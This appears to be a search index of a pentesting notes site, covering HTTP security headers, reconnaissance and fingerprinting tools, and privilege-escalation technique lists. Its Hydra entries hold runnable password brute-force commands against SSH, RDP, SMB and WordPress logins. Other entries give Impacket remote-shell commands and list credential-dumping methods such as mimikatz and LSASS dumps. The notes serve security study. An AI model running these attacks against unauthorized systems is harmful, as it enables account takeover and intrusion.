    Why this configuration is considered safe? Cache-control: no-store, no-cache, max-age=0. - The max-age=N response directive indicates that the response remains fresh until N seconds after the response is generated. - The no-cache response directive indicates that the response can be stored in caches, but the response must be validated with the origin server before each reuse, even when the cache is disconnected from the origin server. - The no-store response directive indicates that any caches of any kind (private or shared) should not store this response.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#server-header","title":"Server header","text":"

    The Server header displays the Web Server banner, for example, Apache, Nginx, IIS etc. Google uses a custom web server banner: gws (Google Web Server).

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#set-cookie","title":"Set-Cookie","text":"

    From geeksforgeeks: \"The\u00a0HTTP header Set-Cookie\u00a0is a response header and used to send cookies from the server to the user agent. So the user agent can send them back to the server later so the server can detect the user.\"

    # The cookie name have to avoid this character ( ) @, ; : \\ \u201d / [ ] ? = { } plus control characters, spaces, and tabs. It can be any US-ASCII characters.\nSet-Cookie: <cookie-name>=<cookie-value>\n\n# This directive defines the host where the cookie will be sent. It is an optional directive.\nSet-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>\n\n# It is an optional directive that contains the expiry date of the cookie.\nSet-Cookie: <cookie-name>=<cookie-value>; Expires=<date>\n\n# Forbids JavaScript from accessing the cookie, for example, through the\u00a0`Document.cookie`\u00a0property. Note that a cookie that has been created with\u00a0`HttpOnly`\u00a0will still be sent with JavaScript-initiated requests, for example, when calling\u00a0`XMLHttpRequest.send()`\u00a0or\u00a0`fetch()`. This mitigates attacks against cross-site scripting XSS.\nSet-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n\n# It contains the life span in a digit of seconds format, zero or negative value will make the cookie expired immediately.\nSet-Cookie: <cookie-name>=<cookie-value>; Max-Age=<number>\n\nSet-Cookie: <cookie-name>=<cookie-value>; Partitioned\n\n# This directive define a path that must exist in the requested URL, else the browser can\u2019t send the cookie header.\nSet-Cookie: <cookie-name>=<cookie-value>; Path=<path-value>\n\nSet-Cookie: <cookie-name>=<cookie-value>; Secure\n\n# This directives providing some protection against cross-site request forgery attacks.\n# Strict means that the browser sends the cookie only for same-site requests, that is, requests originating from the same site that set the cookie. If a request originates from a different domain or scheme (even with the same domain), no cookies with the\u00a0`SameSite=Strict`\u00a0attribute are sent.\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=Strict\n\n# Lax means that the cookie is not sent on cross-site requests, such as on requests to load images or frames, but is sent when a user is navigating to the origin site from an external site (for example, when following a link). This is the default behavior if the\u00a0`SameSite`\u00a0attribute is not specified.\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=Lax\n\n# means that the browser sends the cookie with both cross-site and same-site requests. The\u00a0`Secure`\u00a0attribute must also be set when setting this value, like so\u00a0`SameSite=None; Secure`\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=None; Secure\n\n// Multiple attributes are also possible, for example:\nSet-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Secure; HttpOnly\n
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#understanding-samesite-attribute","title":"Understanding SameSite attribute","text":"

    Differences between SameSite and SameOrigin: we will use the URL\u00a0http://www.example.org\u00a0 to see the differences more clearly.

    URL Description same-site same-origin http://www.example.org Identical URL \u2705 \u2705 http://www.example.org:80 Identical URL (implicit port) \u2705 \u2705 http://www.example.org:8080 Different port \u2705 \u274c http://sub.example.org Different subdomain \u2705 \u274c https://www.example.org Different scheme \u274c \u274c http://www.example.evil Different TLD \u274c \u274c

    When thinking about\u00a0SameSite\u00a0cookies, we're only thinking about \"same-site\" or \"cross-site\".

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#cors-cross-origin-resource-sharing","title":"CORS - Cross-Origin Resource Sharing","text":"

    Cross-Origin Resource Sharing\u00a0(CORS) is an\u00a0HTTP-header based mechanism that allows a server to indicate any\u00a0origins\u00a0(domain, scheme, or port) other than its own from which a browser should permit loading resources.

    For security reasons, browsers restrict cross-origin HTTP requests initiated from scripts.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#x-xss-protection","title":"X-XSS-Protection","text":"

    The HTTP\u00a0X-XSS-Protection\u00a0response header is a feature of Internet Explorer, Chrome and Safari that stops pages from loading when they detect reflected cross-site scripting XSS attacks.

    Syntax

    # Disables XSS filtering.\nX-XSS-Protection: 0\n\n# Enables XSS filtering (usually default in browsers). If a cross-site scripting attack is detected, the browser will sanitize the page (remove the unsafe parts).\nX-XSS-Protection: 1\n\n# Enables XSS filtering. Rather than sanitizing the page, the browser will prevent rendering of the page if an attack is detected.\nX-XSS-Protection: 1; mode=block\n\n# Enables XSS filtering. If a cross-site scripting attack is detected, the browser will sanitize the page and report the violation. This uses the functionality of the CSP report-uri\u00a0directive to send a report.\nX-XSS-Protection: 1; report=<reporting-uri>\n
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#strict-transport-security","title":"Strict-Transport-Security","text":"

    The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) informs browsers that the site should only be accessed using HTTPS, and that any future attempts to access it using HTTP should automatically be converted to HTTPS.

    Directives

    # The time, in seconds, that the browser should remember that a site is only to be accessed using HTTPS.\nmax-age=<expire-time>\n\n# If this optional parameter is specified, this rule applies to all of the site's subdomains as well.\nincludeSubDomains \n

    Example:

    Strict-Transport-Security: max-age=31536000; includeSubDomains\n

    Additionally, Google maintains an HSTS preload service (used also by Firefox and Safari). By following the guidelines and successfully submitting your domain, you can ensure that browsers will connect to your domain only via secure connections. While the service is hosted by Google, all browsers are using this preload list. However, it is not part of the HSTS specification and should not be treated as official. Directive for the preload service is:

    # When using preload, the max-age directive must be at least 31536000 (1 year), and the includeSubDomains directive must be present.\npreload\n

    Sending the\u00a0preload\u00a0directive from your site can have\u00a0PERMANENT CONSEQUENCES\u00a0and prevent users from accessing your site and any of its subdomains if you find you need to switch back to HTTP.

    What OWASP says about HSTS response header.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#exploitation","title":"Exploitation","text":"

    Site owners can use HSTS to identify users without cookies. This can lead to a significant privacy leak. Take a look\u00a0here\u00a0for more details.

    Cookies can be manipulated from sub-domains, so omitting the\u00a0includeSubDomains\u00a0option permits a broad range of cookie-related attacks that HSTS would otherwise prevent by requiring a valid certificate for a subdomain. Ensuring the\u00a0secure\u00a0flag is set on all cookies will also prevent, some, but not all, of the same attacks.

    So... basically HSTS addresses the following threats:

    • User bookmarks or manually types\u00a0http://example.com\u00a0and is subject to a man-in-the-middle attacker: HSTS automatically redirects HTTP requests to HTTPS for the target domain.
    • Web application that is intended to be purely HTTPS inadvertently contains HTTP links or serves content over HTTP: HSTS automatically redirects HTTP requests to HTTPS for the target domain
    • A man-in-the-middle attacker attempts to intercept traffic from a victim user using an invalid certificate and hopes the user will accept the bad certificate: HSTS does not allow a user to override the invalid certificate message
    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#https","title":"HTTPS","text":"

    HTTPS (Hypertext Transfer Protocol Secure) is a secure version of the HTTP protocol, which is used to transmit data between a user's web browser and a website or web application.

    HTTPS provides an added layer of security by encrypting the data transmitted over the internet, making it more secure and protecting it from unauthorized access and interception.

    HTTPS is also commonly referred to as HTTP Secure. HTTPS is the preferred way to use and configure HTTP and involves running HTTP over SSL/TLS.

    SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are cryptographic protocols used to provide secure communication over a computer network, most commonly the internet. They are essential for establishing a secure and encrypted connection between a user's web browser or application and a web server.

    HTTPS does not protect against web application flaws! Various web application attacks will still work regardless of the use of SSL/TLS.(Attacks like XSS and SQLi will still work)

    The added encryption layer only protects data exchanged between the client and the server and does stop attacks against the web application itself.

    ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#tools","title":"Tools","text":"","tags":["pentesting HTTP headers"]},{"location":"http-headers/#security-headers","title":"Security Headers","text":"
    • https://securityheaders.com/
    ","tags":["pentesting HTTP headers"]},{"location":"httprint/","title":"httprint - A web server fingerprinting tool","text":"

    httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask.

    httprint can also be used to detect web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc.

    httprint -P0 -h <target hosts> -s <signature file>\n# -P0 for avoiding pinging the host\n# -h target host\n# -s set the signature file to use\n
    ","tags":["pentesting","enumeration","server enumeration","web server","fingerprinting"]},{"location":"httrack/","title":"HTTrack - A tool for mirrowing sites","text":"

    HTTrack is a free (GPL, libre/free software) offline browser utility that allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.

    HTTrack arranges the original site's relative link-structure. Simply open a page of the \"mirrored\" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.

    ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"httrack/#installation","title":"Installation","text":"

    Link to the project: https://www.httrack.com/.

    sudo apt-get install httrack\n
    ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"httrack/#basic-usage","title":"Basic usage","text":"

    Create a folder for replicating in it your target.

    mkdir targetsite\nhttrack domain.com  targetsite/\n

    Interactive mode:

    httrack\n
    ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"hugo/","title":"Hugo","text":""},{"location":"hugo/#install-hugo","title":"Install Hugo","text":"
    sudo apt-get install hugo\n
    "},{"location":"hugo/#hugo-basic-commands","title":"Hugo basic commands","text":"

    Go to your project folder and creates a new site

    hugo new site <name-project>\n

    Initialize the repo

    git init\n

    Launch the server Hugo so you can open it in your http://localhost:1313

    hugo server\n

    Create new content, like for instance:

    • A new chapter:
    hugo new --kind chapter hugo/_index.md\n
    • A new entry:
    hugo new hugo/quick_start.md\n
    "},{"location":"hydra/","title":"Hydra","text":"

    Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol

    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"hydra/#basic-commands","title":"Basic commands","text":"
    # Main syntax:\nhydra -L users.txt -P pass.txt <service://server> <options>\n\n# Get information about a module\nhydra -U rdp \n\n\n# Attack a telnet service\nhydra -L users.txt -P pass.txt telnet://target.server  \n\n# Attack a ssh service\nhydra -L user.list -P password.list ssh://$ip\n\n# Attack 3389 RDP\nhydra -L user.list -P password.list rdp://$ip\n\n# Attack samba\nhydra -L user.list -P password.list smb://$ip\n\n# Attack a web resource\nhydra -L users-txt -P pass.txt http-get://localhost/   \n# -l: specify login name\n# -L: specify a list with login names\n# -p: specify a single passwords\n# -P: specify a file with passwords\n# -C: specify a file with user:password\n# -t: how many parallel connections to run when cracking\n# -V: verbose\n# -f: it stops the attack after finding a password\n# -M: list of servers to attack, one entry per line, \u2018:\u2019 to specify port\n\n# To see sintax of the http-get and http-post-form modules:\nhydra -U http-post-form   \n# This will return:\n#    <url>:<form parameters>:<condition string>[:<optional>[:<optional>]\n#    Example: \u201c/login.php:userin=^USER^&passin=^PASS^:incorrect\u201d\n#    it perform the attack in the login.php page. It uses the input label name userin (or any other, we need to retrieve this from the html code of the form) to insert the dictionary for users. It uses the input label name passin  (or any other, we need to retrieve this from the html code of the form) to insert the dictionary for passwords. It uses the word incorrect to check out the result of the login process (we need to observe the web behaviour to pick a word). For example:\nhydra -l pentester -P /usr/share/wordlists/metasploit/password.lst zev0nlxhh78mfshrhzvq9h8vm.eu-central-4.attackdefensecloudlabs.com http-post-form \"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1:S=Success\"\n\n\n# Example for ftp in a non default port\nhydra -L users.txt -P pass.txt ftp://$ip:2121\n
    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"hydra/#real-life-examples","title":"Real-life examples","text":"
    hydra crack.me http-post-form \u201c/login.php:usr=^USER^&pwd=^PASS^:invalid credential\u201d -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt -f\n\nhydra 192.168.1.45 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V\n\nhydra -l student -P /usr/share/wordlists/rockyou.txt  ssh://192.153.213.3\n
    ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"i3/","title":"i3 - A windows management tool","text":"

    Some tips from an experienced user: https://www.reddit.com/r/i3wm/comments/zjq8yf/some_tips_on_how_to_take_advantage_of_i3wm/ https://github.com/cknadler/vim-anywhere https://i3wm.org/docs/userguide.html

    "},{"location":"i3/#config-file","title":"Config file","text":"

    Located at ~/.config/i3/config

    You can add your own configurations.

    "},{"location":"i3/#quick-guide","title":"Quick guide","text":"
    # Open a terminal windows. By default it will open horizontally\n$mod+Enter\n\n# Open vertically next window\n$mod+v\n\n# Open horizontally next window\n$mod+h.\n\n# Select your parent container. If you have a selection of containers, then you can do an action on them, like to close them \n$mod+a\n\n# Move the position of the tiled windows \n$mod+Shift+Arrows // and move the windows around\n\n# Close a window\n$mod+Shift+Q\n\n# Enter full-screen mode\n$mod+f\n\n# Switch workspace\n$mod+num // To switch to workspace 2: $mod+2.\n\n# Moving windows to workspaces\n$mod+Shift+num // where num is the target workspace\n\n# Restarting i3\n$mod+Shift+r\n\n# Exiting i3\n$mod+Shift+e\n
    "},{"location":"i3/#customization","title":"Customization","text":""},{"location":"i3/#locking-screen","title":"Locking screen","text":"

    In my case I've added a shortcut to lock the screen:

    # keybinding to lock screen\nbindsym $mod+Control+l exec \"i3lock -c 000000\"\n

    This requires having installed the tools i3lock (allegedly already installed) and xautolock (not preinstalled)

    sudo apt install i3lock xautolock\n
    "},{"location":"i3/#scratchpad","title":"Scratchpad","text":"

    Also, I've added scratchpad shortcuts

    # Make the currently focused window a scratchpad\nbindsym $mod+Shift+space move scratchpad\n\n# Show the first scratchpad window\nbindsym $mod+space scratchpad show\n
    "},{"location":"impacket-ntlmrelayx/","title":"ntlmrelayx - a module from Impacket","text":"","tags":["pentesting","smb"]},{"location":"impacket-ntlmrelayx/#installation","title":"Installation","text":"

    Download from: https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py

    ","tags":["pentesting","smb"]},{"location":"impacket-psexec/","title":"Impacket PsExec","text":"

    The PSExec service then creates a\u00a0named pipe\u00a0that can send commands to the system.

    ","tags":["pentesting","smb"]},{"location":"impacket-psexec/#installation","title":"Installation","text":"

    Donwload from: Impacket PsExec\u00a0-

    ","tags":["pentesting","smb"]},{"location":"impacket-psexec/#basic-commands","title":"Basic commands","text":"
    # Get help \nimpacket-psexec -h\n\n# Connect to a remote machine with a local administrator account\nimpacket-psexec administrator:'<password>'@$ip\n
    ","tags":["pentesting","smb"]},{"location":"impacket-smbexec/","title":"Impacket SMBExec","text":"

    Impacket SMBExec\u00a0- A similar approach to PsExec without using\u00a0RemComSvc. The technique is described here. This implementation goes one step further, instantiating a local SMB server to receive the output of the commands. This is useful when the target machine does NOT have a writeable share available.

    ","tags":["pentesting","windows"]},{"location":"impacket-smbexec/#installation","title":"Installation","text":"

    Donwload from: Impacket PsExec\u00a0-

    ","tags":["pentesting","windows"]},{"location":"impacket-smbexec/#basic-commands","title":"Basic commands","text":"
    # Get help \nimpacket-smbexec -h\n\n# Connect to a remote machine with a local administrator account\nimpacket-smbexec administrator:'<password>'@$ip\n
    ","tags":["pentesting","windows"]},{"location":"impacket/","title":"Impacket - A python tool for network protocols","text":"","tags":["pentesting","windows"]},{"location":"impacket/#what-for","title":"What for?","text":"

    Impacket is a collection of Python classes for working with network protocols. For instance:

    • Ethernet, Linux \"Cooked\" capture.
    • IP, TCP, UDP, ICMP, IGMP, ARP.
    • IPv4 and IPv6 Support.
    • NMB and SMB1, SMB2 and SMB3 (high-level implementations).
    • MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
    • Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
    • Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI.
    • Portions of TDS (MSSQL) and LDAP protocol implementations.
    ","tags":["pentesting","windows"]},{"location":"impacket/#installation","title":"Installation","text":"
    git clone https://github.com/SecureAuthCorp/impacket.git\ncd impacket\npip3 install .\n\n# OR:\nsudo python3 setup.py install\n\n# In case you are missing some modules:\npip3 install -r requirements.txt\n\n# In case you don't have pip3 (pip for Python3) installed, or Python3, install it with the following commands\nsudo apt install python3 python3-pip\n
    ","tags":["pentesting","windows"]},{"location":"impacket/#basic-tools-included","title":"Basic tools included","text":"
    • samrdump
    • smbserver
    • PsExec
    ","tags":["pentesting","windows"]},{"location":"index-linux-privilege-escalation/","title":"Index for Linux Privilege Escalation","text":"Guides to have at hand
    • HackTricks. Written by the creator of WinPEAS and LinPEAS.
    • Vulnhub PrivEsc Cheatsheet.
    • s0cm0nkey's Security Reference Guide.

    This is a nice summary related to Local Privilege Escalation by @s4gi_:

    ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#basic-commands-for-reconnaissance","title":"Basic commands for reconnaissance","text":"

    Some basic commands once you have gained access to a Linux machine:

    whoami\npwd\nid\nuname -a\nlsb_release -a\n
    ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#enumeration-scripts","title":"Enumeration scripts","text":"

    Enumeration scripts

    • Scan the Linux system with \"linEnum\".
    • Search for possible paths to escalate privileges with \"linPEAS\".
    • Enumerate privileges with \"Linux Privilege Checker\" tool.
    • Enumerate possible exploits with \"Linux Exploit Suggester\" tool.
    ","tags":["privilege escalation"]},{"location":"index-linux-privilege-escalation/#privilege-escalation-techniques","title":"Privilege escalation techniques","text":"

    Techniques

    • Cron jobs: path, wildcards, file overwrite.
    • Daemons.
    • Dirty cow.
    • File Permissions:
      • Configuration files.
      • Startup scripts.
      • Process capabilities: getcap
      • Suid binaries: shared object injection, symlink, environmental variables.
      • Lxd privileges escalation.
    • Kernel vulnerability exploitation.
    • LD_PRELOAD / LD_LIBRARY_PATH.
    • NFS.
    • Password Mining: logs, memory, history, configuration files.
    • Sudo: shell escape sequences, abuse intended functionality.
    • ssh keys.
    ","tags":["privilege escalation"]},{"location":"index-windows-privilege-escalation/","title":"Index for Windows Privilege Escalation","text":"Guides to have at hand
    • HackTricks. Written by the creator of WinPEAS and LinPEAS.
    • Vulnhub PrivEsc Cheatsheet.
    • s0cm0nkey's Security Reference Guide.

    This is a nice summary related to Local Privilege Escalation by @s4gi_:

    ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#enumeration-scripts","title":"Enumeration scripts","text":"

    Enumeration scripts

    • Windows Privilege Escalation Awesome Scripts: winPEAS tool.
    • Seatbelt.
    • JAWS.
    ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#privilege-escalation-techniques","title":"Privilege escalation techniques","text":"

    Techniques

    • Services:
      • DLL Hacking.
      • Uniqued Path.
      • Named Pipes.
      • Registry.
      • Windows binaries: LOLBAS.
      • bin Path.
      • Abusing a service with PowerUp.ps1
    • Kernel.
    • Password Mining:
      • Cached SAM.
      • Cached LSASS.
      • Pass The Hash.
      • Configuration files: unattend.xml, SiteList.xml, web.config, vnc.ini.
      • Logs.
      • Credentials in recently accessed files/executed commands
      • Memory: mimiktenz, Process Dump (minidump).
      • .rdp Files.
      • Registry: HKCU\\Software\\USERNAME\\PuTTY\\Sessions, AutoLogon, VNC.
    • Registry:
      • Autorun.
      • AlwaysInstallElevated
    • Scheduled Tasks:
      • Binary Overwrite.
      • Missing binary.
    • Hot Potato.
    • Startup Applications
    ","tags":["privilege escalation","windows"]},{"location":"index-windows-privilege-escalation/#privilege-escalation-tools","title":"Privilege escalation tools","text":"
    • CrackMapexex.
    • mimikatz.
    ","tags":["privilege escalation","windows"]},{"location":"information-gathering/","title":"Information gathering","text":"Sources for these notes
    • Hack The Box: Penetration Testing Learning Path
    • INE eWPT2 Preparation course
    • OWASP Web Security Testing Guide 4.2 > 1. Information Gathering
    • My own notes coming from experience pentesting.
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#methodology","title":"Methodology","text":"

    Information gathering is typically broken down into two types:

    • Passive information gathering - Involves gathering as much information as possible without actively engaging with the target.
    • Active information gathering/Enumeration - Involves gathering as much information as possible by actively engaging with the target system. (You will require authorization in order to perform active information gathering).
    Passive Information Gathering Active Information Gathering/Enumeration Identifying domain names and domain ownership information. Identify website content structure. Discovering hidden/disallowed files and directories. Downloading & analyzing website/web app source code. Identifying web server IP addresses & DNS records. Port scanning & service discovery. Identifying web technologies being used on target sites. Web server fingerprinting. WAF detection. Web application scanning. Identifying subdomains. DNS Zone Transfers. Identify website content structure. Subdomain enumeration via Brute-Force.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#1-passive-information-gathering","title":"1. Passive information gathering","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#11-fingerprint-web-server","title":"1.1. Fingerprint Web Server","text":"

    Or Passive server enumeration.

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

    ID Link to Hackinglife Link to OWASP Objectives 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#host-command","title":"host command","text":"

    DNS lookup utility.

    host domain.com\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whois-command","title":"whois command","text":"

    WHOIS is a query and response protocol that is used to query databases that store the registered users or organizations of an internet resource like a domain name or an IP address block.

    WHOIS lookups can be performed through the command line interface via the whois client or through some third party web-based tools to lookup the domain ownership details from different databases.

     whois $TARGET\n
    whois.exe <TARGET>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#netcraft","title":"netcraft","text":"

    Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used. Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration.

    More issues fired up by netcraft: cms, server programming,...

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#censys","title":"censys","text":"

    https://search.censys.io/

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#shodan","title":"Shodan","text":"
    • https://www.shodan.io/
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wayback-machine","title":"Wayback machine","text":"

    We can access several versions of these websites using the Wayback Machine to find old versions that may have interesting comments in the source code or files that should not be there.

    We can also use the tool waybackurls to inspect URLs saved by Wayback Machine and look for specific keywords. Installation:

    go install github.com/tomnomnom/waybackurls@latest\n

    Basic usage:

    waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#12-passive-dns-enumeration","title":"1.2. Passive DNS enumeration","text":"

    A valuable resource for this information is the Domain Name System (DNS). We can query DNS to identify the DNS records associated with a particular domain or IP address.

    • Complete DNS enumeration guide: definition and techniques.

    Some if these tools can also be used in Active DNS enumerations.

    Worth trying: DNSRecon.

    Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. DNSRecon Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target. dnsdumpster.com DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#13-reviewing-server-metafiles","title":"1.3. Reviewing server metafiles","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.5. Review Webpage content for Information Leakage

    ID Link to Hackinglife Link to OWASP Objectives 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist.

    Some of these files:

    • robots.txt
    • sitemap.xml
    • security.txt (proposed standard which allows websites to define security policies and contact details.)
    • human.txt (initiative for knowing the people behind a website.)
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#14-conduct-search-search-engine-discovery","title":"1.4. Conduct search Search Engine Discovery","text":"

    Dorking

    • Complete google dork guide.
    • Complete github dork guide.

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.1. Conduct search engine discovery reconnaissance for information leakage

    ID Link to Hackinglife Link to OWASP Objectives 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#15-fingerprint-web-application-technology-and-frameworks","title":"1.5. Fingerprint web application technology and frameworks","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.8. Fingerprint Web Application Framework

    ID Link to Hackinglife Link to OWASP Objectives 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message.

    If we discover the webserver behind the target application, it can give us a good idea of what operating system is running on the back-end server.

    For instance:

    • IIS 6.0: Windows Server 2003
    • IIS 7.0-8.5: Windows Server 2008 / Windows Server 2008R2
    • IIS 10.0 (v1607-v1709): Windows Server 2016
    • IIS 10.0 (v1809-): Windows Server 2019

    Although this is usually correct when dealing with Windows, we can not be sure in the case of Linux or BSD-based distributions as they can run different web server versions

    How to spot a web server?

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#http-headers","title":"HTTP headers","text":"

    X-Powered-By and cookies: - .NET: ASPSESSIONID<RANDOM>=<COOKIE_VALUE> - PHP: PHPSESSID=<COOKIE_VALUE> - JAVA: JSESSION=<COOKIE_VALUE>

    More manual techniques on OWASP 4.2: WSTG-INFO-08

    Banner Grabbing / Web Server Headers

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whatweb","title":"whatweb","text":"

    whatweb**.

    whatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wappalyzer","title":"Wappalyzer","text":"

    Wappalyzer**

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wafw00f","title":"wafw00f","text":"

    wafw00f**:

    wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#aquatone","title":"Aquatone","text":"

    Aquatone

    cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#builtwith","title":"BuiltWith","text":"

    Addons BuiltWith: BuiltWith\u00ae covers 93,551+ internet technologies which include analytics, advertising, hosting, CMS and many more.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#curl","title":"Curl","text":"

    Curl:

    curl -IL https://<TARGET>\n# -I: --head (HTTP  FTP  FILE) Fetch the headers only!\n# -L, --location: (HTTP) If the server reports that the requested page has moved to a different location (indicated with a Location: header and a 3XX response  code),  this  option  will make  curl  redo the request on the new place. If used together with -i, --include or -I, --head, headers from all requested pages will be shown. \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap","title":"nmap","text":"

    nmap:

    sudo nmap -v $ip --script banner.nse\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#16-waf-detection","title":"1.6. WAF detection","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wafw00f_1","title":"wafw00f","text":"

    wafw00f**:

    wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file \n# -p proxy the requests \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_1","title":"nmap","text":"

    nmap:

    nmap -p443 --script http-waf-detect <host>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#17-code-analysis-httrack-and-eyewitness","title":"1.7. Code analysis: HTTRack and EyeWitness","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.7. Map Execution Paths through applications

    ID Link to Hackinglife Link to OWASP Objectives 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#httrack","title":"HTTRack","text":"

    HTTRack tutorial

    Create a folder for replicating in it your target.

    mkdir targetsite\nhttrack domain.com  targetsite/\n

    Interactive mode:

    httrack\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#eyewitness","title":"EyeWitness","text":"

    EyeWitness tutorial

    First, create a file with the target domains, like for instance, listOfdomains.txt.

    Then, run:

    eyewitness --web -f listOfdomains.txt -d path/to/save/\n

    After that you will get a report.html file with the request and a screenshot of those domains.

    # Proxing the request via BurpSuite\neyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#18-passive-crawling-with-burp-suite","title":"1.8. Passive crawling with Burp Suite","text":"

